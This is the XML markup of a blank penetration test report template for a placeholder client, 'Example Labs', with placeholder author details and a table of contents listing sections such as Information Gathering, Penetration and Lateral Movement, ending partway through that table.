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E700D" w14:textId="12882CD1" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="X74d7c4fe84217a5173a8e5c2d960e19f8be233b"/>
      <w:bookmarkStart w:id="1" w:name="X12cad2938b5fbc5516a257c92c95646878adf32"/>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Example Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00D206E6">
        <w:br/>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00351B82">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Test Report for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Example Labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687D913E" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3439E54B" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6256265A" wp14:editId="1E0A3339">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>809625</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>203835</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4324350" cy="432435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E4C0F" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21589ED0" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD1505A" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C046EC6" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511A9937" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0474B36B" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C13BA95" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE9AE22" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECA3D8B" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA7EC9E" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582D2B42" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E17637" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8103C1" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1379F2E9" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4868886B" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D465E6A" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA0F7C7" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CDACFB" w14:textId="16C9EB53" w:rsidR="00877200" w:rsidRDefault="00DB5768" w:rsidP="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Abstract"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nameson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F0471C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DB5768">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>SOME-1D3NT1F13R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F0471C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>DD-MM-YYYY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B9ACBB" w14:textId="0C330870" w:rsidR="00DB5768" w:rsidRDefault="00DB5768">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc39759499"/>
      <w:bookmarkStart w:id="4" w:name="outline"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4DA4EFDF" w14:textId="3B3E3E22" w:rsidR="00DB5768" w:rsidRDefault="00DB5768">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-2" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc39759499" w:history="1">
        <w:r w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table of Contents</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759499 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B93118E" w14:textId="7826C184" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759500" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Outline</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759500 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="641562BB" w14:textId="43F5341B" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759501" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Introduction</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759501 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23797A39" w14:textId="20C672C4" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759502" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Objective</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759502 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0652B1D4" w14:textId="084240C7" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759503" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Requirements</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759503 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D7CD2AE" w14:textId="6ECCE62B" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759504" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>High-Level Summary</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759504 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28AB2DB0" w14:textId="2E83C382" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759505" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Overview of Compromised Machines</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759505 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A046F8F" w14:textId="0C97F130" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759506" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Recommendations</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759506 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00014DAC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2738AAC0" w14:textId="43475D85" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759507" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Methodologies</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759507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43FB4D82" w14:textId="3662BF7A" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759508" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Information Gathering</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759508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1AD95230" w14:textId="2CD74BA6" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759509" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Penetration</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759509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1E32CCBD" w14:textId="2D8F74D5" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759510" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Maintaining Access</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759510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1DE52536" w14:textId="55846D10" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759511" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Lateral Movement</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759511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7AD14515" w14:textId="72B82B17" w:rsidR="00DB5768" w:rsidRDefault="00C53697">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc39759512" w:history="1">
        <w:r w:rsidR="00DB5768" w:rsidRPr="0040299D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>House Cleaning</w:t>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc39759512 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB5768">
          <w:rPr>
            <w:noProof/>
